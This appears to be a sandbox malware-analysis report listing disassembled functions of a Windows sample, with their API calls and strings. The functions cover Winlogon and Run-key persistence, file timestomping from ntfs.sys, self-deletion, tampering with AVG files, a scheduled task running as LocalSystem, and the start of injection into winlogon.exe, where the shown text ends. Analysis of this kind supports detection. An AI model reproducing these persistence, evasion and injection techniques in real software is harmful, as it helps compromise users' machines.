                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03314871684218BEF311EB90DC96FEA7768EF89B00F104165F304AA1D0DBF16A45CBA9
                                                                                                                                                                                                                    Function 00402810 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 198 402810-40284f RegCreateKeyExA 199 402855-4028b9 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 198->199 200 4028dd-4028fe RegCreateKeyExA 198->200 201 4028c0-4028c5 199->201 202 402900-402902 200->202 203 402924-40292a 200->203 201->201 204 4028c7-4028db 201->204 205 402905-40290a 202->205 206 40292c-402937 RegFlushKey RegCloseKey 203->206 207 40293d-402940 203->207 208 40291e RegSetValueExA 204->208 205->205 209 40290c-40291d 205->209 206->207 208->203 209->208
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040284B
                                                                                                                                                                                                                    • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402866
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 00402873
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 00402890
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 004028AB
                                                                                                                                                                                                                    • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 004028FA
                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 0040291E
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(00000000), ref: 0040292D
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402937
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402833
                                                                                                                                                                                                                    • SystemDrive, xrefs: 00402861
                                                                                                                                                                                                                    • software\microsoft\windows\currentversion\run, xrefs: 004028F0
                                                                                                                                                                                                                    • userinit, xrefs: 00402918
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                                    • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                    • API String ID: 3547530944-2324515132
                                                                                                                                                                                                                    • Opcode ID: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
                                                                                                                                                                                                                    • Instruction ID: 580de61d93956de76c260b8cd85b43503f34d02da1fa31da69fbe3ce3aace33d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4bf4f337ed71f520bd7e73d3d42088919ba7b50cd5950a846e16a8a3e84f3f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F3166B5740305BBE720DB909D4AFEA777CDB95B00F208155FB44BA1D0D6F4AA448BA8
                                                                                                                                                                                                                    Function 004013C0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93processstringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 272 4013c0-401441 memset * 2 lstrcpynA CreateProcessA 273 401443-401453 272->273 274 40149f-4014a7 272->274 275 401455-40145e GetHandleInformation 273->275 276 40146d-401477 273->276 275->276 277 401460-401464 275->277 278 401491-40149c 276->278 279 401479-401482 GetHandleInformation 276->279 277->276 280 401466-401467 CloseHandle 277->280 279->278 281 401484-401488 279->281 280->276 281->278 282 40148a-40148b CloseHandle 281->282 282->278
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004013D8
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004013FE
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,00402BDF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401416
                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401439
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040145A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401467
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,00402BDF,?,?,?,00000000,00000000,00000000), ref: 0040147E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040148B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                                    • API String ID: 2248944234-2746444292
                                                                                                                                                                                                                    • Opcode ID: c48a064c7529e876acfcd4e90bb1c684e8bfef1ce1d99d06041c7af5d8c72a1f
                                                                                                                                                                                                                    • Instruction ID: 09676c1f46593a06cd44afd8140421a4ba04e6465ccbd83babddadcd264a60ad
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c48a064c7529e876acfcd4e90bb1c684e8bfef1ce1d99d06041c7af5d8c72a1f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 862165B1A002196FDB10DFE4DD85AEF7BBCAB44354F00817AFA08F6291D6349A448BB5
                                                                                                                                                                                                                    Function 00401B60 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76filetimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 283 401b60-401b8c CreateFileA 284 401b92-401bae GetFileTime 283->284 285 401c25-401c2a 283->285 286 401bb0-401bbd GetHandleInformation 284->286 287 401bcc-401be9 CreateFileA 284->287 286->287 288 401bbf-401bc3 286->288 287->285 289 401beb-401c07 SetFileTime 287->289 288->287 290 401bc5-401bc6 CloseHandle 288->290 289->285 291 401c09-401c16 GetHandleInformation 289->291 290->287 291->285 292 401c18-401c1c 291->292 292->285 293 401c1e-401c1f CloseHandle 292->293 293->285
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401B85
                                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?,?,?), ref: 00401B9F
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401BB5
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401BC6
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402B87,?), ref: 00401BE2
                                                                                                                                                                                                                    • SetFileTime.KERNELBASE(00000000,?,?,00402B87,?,?,?,?,?,00402B87,?), ref: 00401BF8
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402B87,?), ref: 00401C0E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402B87,?), ref: 00401C1F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401B80
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                                    • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                                    • API String ID: 1046229350-2760794270
                                                                                                                                                                                                                    • Opcode ID: a3513c22781d9b883142d906c5a388a7ca545872d8ccd4c85f932c2de55d5d3d
                                                                                                                                                                                                                    • Instruction ID: 5c288fe5b10a83830543158496eb663db1d1ba801f64cc380cadfe311b19cddd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3513c22781d9b883142d906c5a388a7ca545872d8ccd4c85f932c2de55d5d3d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3721D7725402187BE7219B90DD09FEFBB7CAF84710F108225FF11761D0E774964586A8
                                                                                                                                                                                                                    Function 004011C0 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(00401C30,?,0000001C), ref: 004011EF
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401205
                                                                                                                                                                                                                    • PathFileExistsA.KERNELBASE(?), ref: 00401212
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401229
                                                                                                                                                                                                                    • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401241
                                                                                                                                                                                                                    • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040125D
                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040126C
                                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(?), ref: 00401279
                                                                                                                                                                                                                    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040128D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2787354276-0
                                                                                                                                                                                                                    • Opcode ID: 13bd0b2ba2dd39b79c74d8f201215cd59729224600901bedf3da6c7ccc4d33b0
                                                                                                                                                                                                                    • Instruction ID: 6fb89bbc187d80a5bc5b9bf27070627c8da11026cf83192134f00bca91ba5049
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13bd0b2ba2dd39b79c74d8f201215cd59729224600901bedf3da6c7ccc4d33b0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C21FCB1900219AFDB50DBA0DD49FEA77BCAB48700F4045A9E705F6190E7B49A54CFA4
                                                                                                                                                                                                                    Function 00401000 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 303 401000-401009 304 401090-401096 303->304 305 40100f-401012 303->305 305->304 306 401014-401016 305->306 306->304 307 401018-401035 CreateFileA 306->307 308 401086-40108d 307->308 309 401037-40104d WriteFile 307->309 310 40105f-401068 309->310 311 40104f-401058 SetEndOfFile 309->311 310->308 313 40106a-401077 GetHandleInformation 310->313 311->310 312 40105a 311->312 312->310 313->308 314 401079-40107d 313->314 314->308 315 40107f-401080 CloseHandle 314->315 315->308
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00402B5B,00000000), ref: 0040102A
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,[+@,?,00000000,00000000,?,?,00402B5B,00000000), ref: 00401045
                                                                                                                                                                                                                    • SetEndOfFile.KERNELBASE(00000000,?,?,00402B5B,00000000), ref: 00401050
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040106F
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00401080
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Handle$CloseCreateInformationWrite
                                                                                                                                                                                                                    • String ID: [+@
                                                                                                                                                                                                                    • API String ID: 1150544999-2667881658
                                                                                                                                                                                                                    • Opcode ID: 21b66d7867ddfbefa27aaeae67b762b005cc489ba47700022ac87a39cc13ab03
                                                                                                                                                                                                                    • Instruction ID: c834b12cbe40c0e9b10b40bca9c4cb852a2dca9cf30c5b09766062945076e325
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21b66d7867ddfbefa27aaeae67b762b005cc489ba47700022ac87a39cc13ab03
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0311E971600244B7E7205B65DD08FAB765DDBC1790F048236FF84F62E0D7758D8082B8
                                                                                                                                                                                                                    Function 00402330 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402348
                                                                                                                                                                                                                    • MoveFileA.KERNEL32(?,?), ref: 0040240F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFolderMovePath
                                                                                                                                                                                                                    • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                                    • API String ID: 1404575960-1083204512
                                                                                                                                                                                                                    • Opcode ID: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
                                                                                                                                                                                                                    • Instruction ID: 218ec206f196096905059f0fa712dce574fe6e09d85f3a618a89c2f21692c038
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85613be8a7ff22d3f2708ffc80a5f36b51ac17d5ce9254ffd30377348588094f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43214FB45043448FC759CF14EA98B92BBF4BF98300F1581FADA89A73A2D774D944CB98
                                                                                                                                                                                                                    Function 0040207A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0040208C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                    • String ID: V,@
                                                                                                                                                                                                                    • API String ID: 3664257935-3634209070
                                                                                                                                                                                                                    • Opcode ID: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
                                                                                                                                                                                                                    • Instruction ID: d15e959a12f23ccec2fe85088e2afbb8a6d817ea7d7d5b015e5417604cfff27a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fd4ca95ddf0f334cf370a94dc23c54eb0d0c4c01a3467e788c39c0190814706
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12D05E76E027298BCB20CF94A5052AEF730FB44731F0043AADE257338083351C118AD4

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Function 00403440 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040348E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004034AE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004034CE
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 004034D6
                                                                                                                                                                                                                    • GetVersionExA.KERNEL32 ref: 004034F1
                                                                                                                                                                                                                      • Part of subcall function 004033A0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
                                                                                                                                                                                                                      • Part of subcall function 004033A0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
                                                                                                                                                                                                                      • Part of subcall function 004033A0: OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
                                                                                                                                                                                                                      • Part of subcall function 004033A0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
                                                                                                                                                                                                                      • Part of subcall function 004033A0: CloseHandle.KERNEL32(00000000), ref: 00403427
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403535
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040354E
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035AB
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035F7
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76D6DB30), ref: 004035FE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403616
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00403630
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <Actions , xrefs: 004036EA
                                                                                                                                                                                                                    • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403477
                                                                                                                                                                                                                    • 00-->, xrefs: 0040371F
                                                                                                                                                                                                                    • task%d, xrefs: 0040353C
                                                                                                                                                                                                                    • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403454
                                                                                                                                                                                                                    • p=Dv, xrefs: 0040382B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                                    • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=Dv$task%d
                                                                                                                                                                                                                    • API String ID: 1601901853-2684908384
                                                                                                                                                                                                                    • Opcode ID: d0b0790f7991d78f00ea7e7fde430ce6b596ebd0b63758b6d90d9f24c7b2decc
                                                                                                                                                                                                                    • Instruction ID: fd62d51515435fe7aa577a9a46339635c431e4e957a39cb3738b378977d63dce
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0b0790f7991d78f00ea7e7fde430ce6b596ebd0b63758b6d90d9f24c7b2decc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5D1E0B2504301ABC720EF64CC48B5B7BA8EFC8751F048669FA45A72D1E774EA04CB99
                                                                                                                                                                                                                    Function 004017F0 Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 234memoryprocessCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040181B
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75C25430,00000000,?), ref: 00401833
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00401860
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401873
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004018DD
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040193A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040194A
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
                                                                                                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 004019B6
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 004019C5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 004019D5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 004019E1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 004019F4
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00401A04
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                                    • API String ID: 3422789474-2746444292
                                                                                                                                                                                                                    • Opcode ID: 305985fe563536e86098805144d0a2e1e56e9e587e80ceb7f6eacc4e8f8e770f
                                                                                                                                                                                                                    • Instruction ID: 7aa473d0462345c53030a0d843d553fe9ec79da9d6527bb3e9654a4a16b7ec1b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 305985fe563536e86098805144d0a2e1e56e9e587e80ceb7f6eacc4e8f8e770f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A6195B1A01215BBDB209FA58C45FAF7B6CEF84751F15422AFE14B72D0CA749D00CAA8
                                                                                                                                                                                                                    Function 00401580 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00401C70: memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                                      • Part of subcall function 00401C70: GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                                      • Part of subcall function 00401C70: SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                                      • Part of subcall function 00401C70: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015AD
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015CC
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004015EB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401601
